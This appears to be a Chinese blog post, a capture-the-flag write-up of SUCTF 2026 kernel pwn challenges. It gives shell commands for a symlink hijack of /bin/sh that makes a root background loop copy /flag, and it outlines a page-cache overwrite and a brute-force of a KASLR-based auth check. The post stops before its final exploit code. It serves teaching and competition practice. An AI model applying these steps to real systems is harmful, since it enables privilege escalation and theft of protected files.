

<!DOCTYPE html>
<html lang="zh-CN" >



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/roxy.jpg">
  <link rel="icon" href="/img/roxy.jpg">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#ffffff">
  <meta name="author" content="roxy">
  <meta name="keywords" content="">
  
    <meta name="description" content="hello kernel pwn! 今天复盘一下SUCTF 并借此开启Kernel pwn的学习之旅 参考WP: https:&#x2F;&#x2F;blog.xmcve.com&#x2F;2026&#x2F;03&#x2F;17&#x2F;SUCTF2026-Writeup&#x2F; https:&#x2F;&#x2F;0psu3.team&#x2F;2026&#x2F;03&#x2F;24&#x2F;SUCTF2026 Writeup by 0psu3&#x2F;#SU-Chronos-Ring1 SU_Chronos_Ring">
<meta property="og:type" content="article">
<meta property="og:title" content="hello kernel pwn!">
<meta property="og:url" content="https://rr00xxyy.github.io/2026/04/05/hello-kernel-pwn/index.html">
<meta property="og:site_name" content="roxy&#39;s blog">
<meta property="og:description" content="hello kernel pwn! 今天复盘一下SUCTF 并借此开启Kernel pwn的学习之旅 参考WP: https:&#x2F;&#x2F;blog.xmcve.com&#x2F;2026&#x2F;03&#x2F;17&#x2F;SUCTF2026-Writeup&#x2F; https:&#x2F;&#x2F;0psu3.team&#x2F;2026&#x2F;03&#x2F;24&#x2F;SUCTF2026 Writeup by 0psu3&#x2F;#SU-Chronos-Ring1 SU_Chronos_Ring">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://rr00xxyy.github.io/images/131.png">
<meta property="og:image" content="https://rr00xxyy.github.io/images/132.png">
<meta property="og:image" content="https://rr00xxyy.github.io/images/133.png">
<meta property="og:image" content="https://rr00xxyy.github.io/images/134.png">
<meta property="article:published_time" content="2026-04-05T04:31:20.000Z">
<meta property="article:modified_time" content="2026-06-28T18:26:44.110Z">
<meta property="article:author" content="roxy">
<meta property="article:tag" content="Buffer">
<meta property="article:tag" content="KASLR">
<meta property="article:tag" content="bit manipulation">
<meta property="article:tag" content="dirty page">
<meta property="article:tag" content="fd">
<meta property="article:tag" content="flags">
<meta property="article:tag" content="kernel">
<meta property="article:tag" content="linux">
<meta property="article:tag" content="memcpy">
<meta property="article:tag" content="mmap">
<meta property="article:tag" content="page cache">
<meta property="article:tag" content="pwn">
<meta property="article:tag" content="qemu">
<meta property="article:tag" content="root">
<meta property="article:tag" content="shell">
<meta property="article:tag" content="xor">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://rr00xxyy.github.io/images/131.png">
  
  
  
  <title>hello kernel pwn! - roxy&#39;s blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  



  
<link rel="stylesheet" href="/css/mui-fluid.css">



  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"rr00xxyy.github.io","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 8.1.1"></head>


<body class="post-page post-page">
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/" target="_self">
                <i class="iconfont icon-link-fill"></i>
                <span>友链</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/a.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="hello kernel pwn!"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2026-04-05 12:31" pubdate>
          2026年4月5日 下午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          11k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          89 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">hello kernel pwn!</h1>
            
            
              <div class="markdown-body">
                
                <h1>hello kernel pwn!</h1>
<p>今天复盘一下<code>SUCTF</code></p>
<p>并借此开启<code>Kernel pwn</code>的学习之旅</p>
<p>参考WP:</p>
<p><a target="_blank" rel="noopener" href="https://blog.xmcve.com/2026/03/17/SUCTF2026-Writeup/">https://blog.xmcve.com/2026/03/17/SUCTF2026-Writeup/</a></p>
<p><a target="_blank" rel="noopener" href="https://0psu3.team/2026/03/24/SUCTF2026%20Writeup%20by%200psu3/#SU-Chronos-Ring1">https://0psu3.team/2026/03/24/SUCTF2026 Writeup by 0psu3/#SU-Chronos-Ring1</a></p>
<h2 id="SU-Chronos-Ring">SU_Chronos_Ring</h2>
<h3 id="前置">前置</h3>
<p>做题之前</p>
<p>首先要知道的一些前置知识:</p>
<div class="note note-info">
            <p>仅为个人理解</p> 
          </div>
<p>内核pwn不会真的让你去找内核的漏洞</p>
<p>而是提供一个<code>.ko</code>文件，即<strong>LKM</strong>(Loadable Kernel Module，可加载内核模块)的编译产物</p>
<p>你需要<strong>逆向</strong>这个文件，找到交互逻辑的漏洞点(ioctl，open，read，write，mmap，rcu，UAF...)</p>
<div class="note note-secondary">
            <p><strong>LKM</strong>是指可以动态插入到<code>Linux</code>内核中(或从内核中卸载)的代码，用于扩展内核功能而不需要重新编译整个内核</p> <p>使用<code>lsmod</code>命令查看</p> 
          </div>
<p>提供<code>initramfs.cpio.gz</code></p>
<p>初始内存文件系统镜像(使用<code>cpio</code>打包并<code>gzip</code>压缩)</p>
<p>内核启动时将其解压到内存作为根文件系统，其中包含必要的用户态程序(<code>/init</code>，<code>/bin/sh</code>等)，题目提供的可执行文件以及<code>flag</code>文件等</p>
<p>flag是给你本地测试用的，别像我一样拿去提交qwq</p>
<p>重点关注<strong>init</strong>脚本</p>
<p>它是用户态的第一个进程(<code>PID 1</code>)，也因此决定了系统如何启动</p>
<p>在内核pwn中，分析<code>init</code>脚本往往是理解题目配置，定位漏洞触发条件的第一步</p>
<p>解压步骤:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># 解压 gzip</span><br>gunzip initramfs.cpio.gz<br><span class="hljs-comment"># 创建临时目录并解包 cpio</span><br><span class="hljs-built_in">mkdir</span> initramfs_root<br><span class="hljs-built_in">cd</span> initramfs_root<br>cpio -idmv &lt; ../initramfs.cpio<br></code></pre></td></tr></table></figure>
<p>区别于用户态pwn用python写exp</p>
<p>内核态的pwn通常使用<code>c语言</code></p>
<p>本地测试时:</p>
<p><strong>静态链接编译</strong> + 将exp放入上面得到的<code>initramfs_root</code>文件系统的<code>/home/ctf</code>处(<strong>家目录</strong>) + 重新打包</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># /challenge/</span><br>code exp.c<br>gcc -static -o exp exp.c<br><br><span class="hljs-comment"># /challenge/initramfs_root/</span><br><span class="hljs-built_in">cp</span> ../exp ./home/ctf/<br><br>find . | cpio -o -H newc | gzip &gt; ../initramfs.cpio.gz<br></code></pre></td></tr></table></figure>
<p>本地gdb(pwndbg)调试，打远程方法，环境搭建</p>
<p>待补充</p>
<p>提供<code>run.sh</code></p>
<p><code>qemu</code>启动脚本</p>
<p>示例:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-meta">#!/bin/sh</span><br>TIMEOUT=300<br><br><span class="hljs-built_in">exec</span> <span class="hljs-built_in">timeout</span> --signal=KILL <span class="hljs-variable">$&#123;TIMEOUT&#125;</span> \<br>qemu-system-x86_64 \<br>    -m 96M \<br>    -nographic \<br>    -enable-kvm \<br>    -smp 2 \<br>    -cpu max \<br>    -kernel ./bzImage \<br>    -initrd ./initramfs.cpio.gz \<br>    -monitor /dev/null \<br>    -append <span class="hljs-string">&quot;console=ttyS0 kaslr no5lvl pti=on oops=panic panic=1 quiet&quot;</span> \<br>    -no-reboot<br></code></pre></td></tr></table></figure>
<p>本地使用<code>sudo ./run.sh</code>启动challenge</p>
<p>包含内核保护开启情况</p>
<p>待补充</p>
<div class="note note-primary">
            <p>常用命令</p> <p>cat /proc/kallsyms</p> <p>id</p> <p>to be continued</p> 
          </div>
<p>提供<code>bzImage</code></p>
<p>编译好的<code>Linux</code>内核映像(压缩格式)</p>
<p>提供<code>Dockerfile</code>，<code>docker-compose.yml</code>(maybe)</p>
<p>我似乎止步于此了</p>
<h3 id="exp">exp</h3>
<p>启动challenge</p>
<p><img src="/images/131.png" srcset="/img/loading.gif" lazyload alt="如图"></p>
<p>注意到<strong>bin竟然任何人都可写</strong></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">drwxrwxrwx 2 ctf ctf 1940 Apr 5 05:16 bin<br></code></pre></td></tr></table></figure>
<p>观察<code>init</code>脚本</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-meta">#!/bin/sh</span><br><br><span class="hljs-built_in">export</span> PATH=/bin:/sbin:/usr/bin:/usr/sbin<br>/bin/busybox --install -s<br><br><span class="hljs-built_in">export</span> PS1=<span class="hljs-string">&#x27;[ctf@SUCTF2026 \w]$ &#x27;</span><br><br><br>mount -t proc proc /proc<br>mount -t sysfs sysfs /sys<br>mount -t devtmpfs devtmpfs /dev<br>mount -t tmpfs tmpfs /tmp<br><br><span class="hljs-built_in">mkdir</span> -p /dev/pts<br><span class="hljs-built_in">mkdir</span> -p /var/lock<br>mount -t devpts devpts /dev/pts || <span class="hljs-literal">true</span><br><br><br><span class="hljs-built_in">echo</span> SUCTF2026 &gt; /proc/sys/kernel/hostname<br><br><br><span class="hljs-built_in">echo</span> <span class="hljs-string">&#x27;root:x:0:0:root:/root:/bin/sh&#x27;</span> &gt; /etc/passwd<br><span class="hljs-built_in">echo</span> <span class="hljs-string">&#x27;ctf:x:1000:1000:ctf:/home/ctf:/bin/sh&#x27;</span> &gt;&gt; /etc/passwd<br><span class="hljs-built_in">echo</span> <span class="hljs-string">&#x27;root:x:0:&#x27;</span> &gt; /etc/group<br><span class="hljs-built_in">echo</span> <span class="hljs-string">&#x27;ctf:x:1000:&#x27;</span> &gt;&gt; /etc/group<br><br><span class="hljs-built_in">chmod</span> 644 /etc/passwd<br><span class="hljs-built_in">chmod</span> 644 /etc/group<br><br><span class="hljs-built_in">mkdir</span> -p /root<br><span class="hljs-built_in">mkdir</span> -p /home/ctf<br><span class="hljs-built_in">chown</span> 1000:1000 /home/ctf<br><span class="hljs-built_in">chmod</span> 777 /home/ctf<br><br><span class="hljs-built_in">echo</span> 1 &gt; /proc/sys/kernel/printk<br><br><span class="hljs-keyword">if</span> [ -e /flag ]; <span class="hljs-keyword">then</span><br>    <span class="hljs-built_in">chown</span> root:root /flag<br>    <span class="hljs-built_in">chmod</span> 400 /flag<br><span class="hljs-keyword">fi</span><br><br><br>insmod /chronos_ring.ko<br><span class="hljs-built_in">chmod</span> 666 /dev/chronos_ring<br><br><span class="hljs-built_in">echo</span> <span class="hljs-string">&quot;#!/bin/sh&quot;</span> &gt; /tmp/job<br><span class="hljs-built_in">echo</span> <span class="hljs-string">&quot;echo &#x27;Root helper is running safely...&#x27;&quot;</span> &gt;&gt; /tmp/job<br><span class="hljs-built_in">chmod</span> 644 /tmp/job<br>(<br>    <span class="hljs-keyword">while</span> <span class="hljs-literal">true</span>; <span class="hljs-keyword">do</span><br>        /bin/sh /tmp/job &gt; /dev/null 2&gt;&amp;1<br>        <span class="hljs-built_in">sleep</span> 3<br>    <span class="hljs-keyword">done</span><br>) &amp;<br><br><span class="hljs-built_in">echo</span><br><span class="hljs-built_in">echo</span> <span class="hljs-string">&quot;===============================================&quot;</span><br><span class="hljs-built_in">echo</span> <span class="hljs-string">&quot;   Welcome to SUCTF 2026: Chronos Ring         &quot;</span><br><span class="hljs-built_in">echo</span> <span class="hljs-string">&quot;            Please pwn!!!                      &quot;</span><br><span class="hljs-built_in">echo</span> <span class="hljs-string">&quot;===============================================&quot;</span><br><span class="hljs-built_in">echo</span><br><br><span class="hljs-built_in">export</span> HOME=/home/ctf<br><span class="hljs-built_in">export</span> TERM=dumb<br><span class="hljs-built_in">cd</span> /home/ctf<br><br><br><span class="hljs-keyword">if</span> <span class="hljs-built_in">command</span> -v su &gt;/dev/null 2&gt;&amp;1; <span class="hljs-keyword">then</span><br>    <span class="hljs-built_in">exec</span> setsid cttyhack su ctf -s /bin/sh<br><span class="hljs-keyword">elif</span> <span class="hljs-built_in">command</span> -v setuidgid &gt;/dev/null 2&gt;&amp;1; <span class="hljs-keyword">then</span><br>    <span class="hljs-built_in">exec</span> setsid cttyhack setuidgid 1000 /bin/sh<br><span class="hljs-keyword">else</span><br>    <span class="hljs-built_in">echo</span> <span class="hljs-string">&quot;[!] warning: no su/setuidgid found, fallback to root shell&quot;</span><br>    <span class="hljs-built_in">exec</span> setsid cttyhack /bin/sh<br><span class="hljs-keyword">fi</span><br>umount /proc<br>umount /sys<br><br>poweroff -d 1 -n -f<br></code></pre></td></tr></table></figure>
<p>注意到</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">echo</span> <span class="hljs-string">&quot;#!/bin/sh&quot;</span> &gt; /tmp/job<br><span class="hljs-built_in">echo</span> <span class="hljs-string">&quot;echo &#x27;Root helper is running safely...&#x27;&quot;</span> &gt;&gt; /tmp/job<br><span class="hljs-built_in">chmod</span> 644 /tmp/job<br>(<br>    <span class="hljs-keyword">while</span> <span class="hljs-literal">true</span>; <span class="hljs-keyword">do</span><br>        /bin/sh /tmp/job &gt; /dev/null 2&gt;&amp;1<br>        <span class="hljs-built_in">sleep</span> 3<br>    <span class="hljs-keyword">done</span><br>) &amp;<br></code></pre></td></tr></table></figure>
<p>系统会不停地以<strong>root</strong>权限执行<code>/bin/sh /tmp/job</code></p>
<p>不过<code>/tmp/job</code>似乎无害</p>
<p>不过</p>
<p>如果我们使用<strong>软链接</strong></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">ln</span> -sf /tmp/evil_sh /bin/sh<br></code></pre></td></tr></table></figure>
<p>此时<code>/bin/sh</code>这个路径不再指向真正的shell，而是指向我们构造的恶意脚本<code>/tmp/evil_sh</code></p>
<p>后台<code>root</code>循环下一次运行时，实际执行的便是:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">/bin/busybox sh /tmp/evil_sh /tmp/job<br></code></pre></td></tr></table></figure>
<p>非预期解exp:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">cat</span> &gt; /tmp/evil_sh &lt;&lt;<span class="hljs-string">EOF</span><br><span class="hljs-string">#!/bin/busybox sh</span><br><span class="hljs-string">cat /flag &gt; /home/ctf/flag.txt</span><br><span class="hljs-string">chmod 777 /home/ctf/flag.txt</span><br><span class="hljs-string">EOF</span><br><br><span class="hljs-built_in">chmod</span> +x /tmp/evil_sh<br><span class="hljs-built_in">ln</span> -sf /tmp/evil_sh /bin/sh<br></code></pre></td></tr></table></figure>
<p>我们并没有直接<strong>提权</strong>，而是利用系统本身的行为，借root之手帮我们执行了一个读<code>/flag</code>的脚本，类似于<code>ret2dlresolve</code>的思想</p>
<div class="note note-danger">
            <p><code>#</code>在shell里通常是注释，但<code>#!</code>放在文件第一行时叫<strong>shebang</strong>，是内核用来决定<strong>用哪个解释器执行这个脚本</strong>的特殊标记</p> <p>所以evil_sh第一行写<code>#!/bin/busybox sh</code></p> <p>意思是让内核用<code>/bin/busybox</code>来运行这个脚本，并让它在<code>sh</code>模式下解释脚本</p> <p>如果写成<code>#!/bin/sh</code></p> <p>在上面的<code>symlink</code>攻击中</p> <p>我们已经使用<strong>软链接</strong>将<code>/bin/sh</code>指向我们构造的恶意脚本</p> <p>这会导致循环解释错误的脚本(无限递归解释自己)</p> <p>直接崩溃</p> 
          </div>
<p>因此给的<code>chronos_ring.ko</code>也不用逆了，直接获得了flag，出题者的小疏忽</p>
<p><img src="/images/132.png" srcset="/img/loading.gif" lazyload alt="如图"></p>
<h2 id="SU-Chronos-Ring1">SU_Chronos_Ring1</h2>
<p><strong>Okay, I made a mistake, please visit again</strong></p>
<p>果不其然</p>
<p>作者的小失误</p>
<p>刚刚便算作是给我这种新手的入门小福利</p>
<p>现在重启真正的内核pwn漏洞利用</p>
<h3 id="逆向">逆向</h3>
<p>先逆向<code>chronos_ring.ko</code></p>
<p>漏洞来自<code>chronos_ioctl</code>模块</p>
<p>有以下关键命令:</p>
<ul>
<li>
<p>0x1001 CMD_CREATE -&gt; Allocates a <code>kernel object</code> containing an internal 4 KB <strong>data buffer</strong> (initially a zero-filled page).</p>
</li>
<li>
<p>0x1007 CMD_WRITE –&gt; Copies <strong>user‑supplied data</strong> into the object’s internal buffer at a given <code>offset</code> and <code>length</code>.</p>
</li>
<li>
<p>0x1002 CMD_AUTH –&gt; Authenticates the caller by comparing a transformed value derived from the kernel’s <strong>kfree address</strong> with a <code>user‑provided key</code>; on success, sets a context flag (flags &amp; 1).</p>
</li>
<li>
<p>0x1004 CMD_LOAD –&gt; Associates the object with a specific page of a given file, stores the <code>page cache</code> <code>page pointer</code>, and sets the object’s state to 1.</p>
</li>
<li>
<p>0x1003 CMD_PIN –&gt; Pins a user‑space memory page using <code>pin_user_pages_fast</code> and sets another context flag (flags &amp; 2).</p>
</li>
<li>
<p>0x1005 CMD_VIEW –&gt; Creates a <code>view</code> structure that either points to a newly allocated page or, if the object’s state is 1, points to the previously loaded file page; the view is then linked to the object.</p>
</li>
<li>
<p>0x1008 CMD_SYNC –&gt; Copies data from the object’s <strong>internal buffer</strong> into the <strong>physical page</strong> referenced by the current <strong>view</strong>; if the view backs a file page, the page is <strong>marked dirty</strong>.</p>
</li>
<li>
<p>0x1009 CMD_QUERY –&gt; Retrieves status information from the kernel object, including <code>context flags</code>, <code>object state</code>, <code>view type</code>, <code>page index</code>, and whether a file page is present; copies a 20‑byte structure to user space.</p>
</li>
</ul>
<p>其中，要执行<code>CMD_LOAD</code>要先通过<code>CMD_AUTH</code>的认证</p>
<p>而同时，必须先<code>CMD_PIN</code>(固定一个用户页)才能成功执行<code>CMD_VIEW</code>，又必须先<code>CMD_VIEW</code>(创建指向文件页的视图)才能让<code>CMD_SYNC</code>将数据拷贝到目标文件页中</p>
<p>一环套一环</p>
<h3 id="思路">思路</h3>
<p>思路是什么呢?</p>
<p>重点依旧是</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">echo</span> <span class="hljs-string">&quot;#!/bin/sh&quot;</span> &gt; /tmp/job<br><span class="hljs-built_in">echo</span> <span class="hljs-string">&quot;echo &#x27;Root helper is running safely...&#x27;&quot;</span> &gt;&gt; /tmp/job<br><span class="hljs-built_in">chmod</span> 644 /tmp/job<br>(<br>    <span class="hljs-keyword">while</span> <span class="hljs-literal">true</span>; <span class="hljs-keyword">do</span><br>        /bin/sh /tmp/job &gt; /dev/null 2&gt;&amp;1<br>        <span class="hljs-built_in">sleep</span> 3<br>    <span class="hljs-keyword">done</span><br>) &amp;<br></code></pre></td></tr></table></figure>
<p>我们先创建一个内核对象(CMD_CREATE)，得到一个可读写的内部缓冲区<code>obj-&gt;data</code></p>
<p>将恶意脚本写入该缓冲区(CMD_WRITE)</p>
<p>通过认证(CMD_AUTH)以执行<code>CMD_LOAD</code></p>
<p>加载目标文件<code>/tmp/job</code>的<code>page cache</code>页(CMD_LOAD)</p>
<p>固定一个无用的用户页(CMD_PIN)，只为<strong>设置标志位</strong>以执行CMD_VIEW</p>
<p>创建视图(CMD_VIEW)，使视图指向<code>/tmp/job</code>的<code>page cache</code>页</p>
<p>将内部缓冲区的内容同步到视图指向的页(CMD_SYNC)，从而覆盖<code>/tmp/job</code>在内存中的内容为我们构造的恶意脚本</p>
<p>等待<code>root</code>的后台任务执行被篡改的脚本，读取<code>flag</code></p>
<p>核心依旧是利用系统本身的行为，借root之手执行任意命令</p>
<h3 id="如何通过CMD-AUTH">如何通过CMD_AUTH?</h3>
<p>关键在于</p>
<p>如何通过<code>CMD_AUTH</code></p>
<p>类似于用户态的<code>ASLR</code></p>
<p>由于内核态的保护机制<code>KASLR</code></p>
<p>每次系统启动时，内核代码段，数据段，符号地址都会被加载到随机偏移的基址上，包括<code>kfree</code></p>
<p><strong>内核地址 = 固定基准 + 随机偏移量</strong></p>
<p>如何泄露其地址呢?</p>
<p>其实并不用</p>
<p>观察认证逻辑</p>
<p><img src="/images/133.png" srcset="/img/loading.gif" lazyload alt="如图"></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs c">((<span class="hljs-type">unsigned</span> <span class="hljs-type">int</span>)v61 ^ src ^ ((<span class="hljs-type">unsigned</span> __int64)&amp;kfree &gt;&gt; <span class="hljs-number">4</span>) &amp; <span class="hljs-number">0xFFFFFFFFFFFE0000L</span>L) != <span class="hljs-number">0xF372FE94F82B3C6EL</span>L<br></code></pre></td></tr></table></figure>
<p>其中<code>((uint64_t)&amp;kfree &gt;&gt; 4) &amp; 0xFFFFFFFFFFFE0000</code>，将<code>kfree</code>的地址右移4位，然后与<strong>掩码</strong><code>0xFFFFFFFFFFFE0000</code>做<strong>与运算</strong></p>
<p>随后与用户程序可以自由控制的src(key)和v61(val)异或</p>
<p>并判断结果是否等于一个固定常数</p>
<p>掩码的低17位为0(<code>0x200000</code>的倍数)，最终实现将<code>&amp;kfree</code>的低21位全部清零的效果，只保留高43位(64位地址)</p>
<p>而由于内核地址空间的高位固定(<code>0xffffffff80000000</code>以上)</p>
<p>且内核text段随机化粒度<strong>2MB</strong>(<code>0x200000</code>)对齐</p>
<p><code>&amp;kfree</code>的<strong>信息熵</strong>并不高，完全可以爆破</p>
<div class="note note-info">
            <p>4096 - 0x1000 - 4KB</p> <p>0x200000 - 2MB</p> 
          </div>
<h3 id="exp-2">exp</h3>
<p>最终exp:</p>
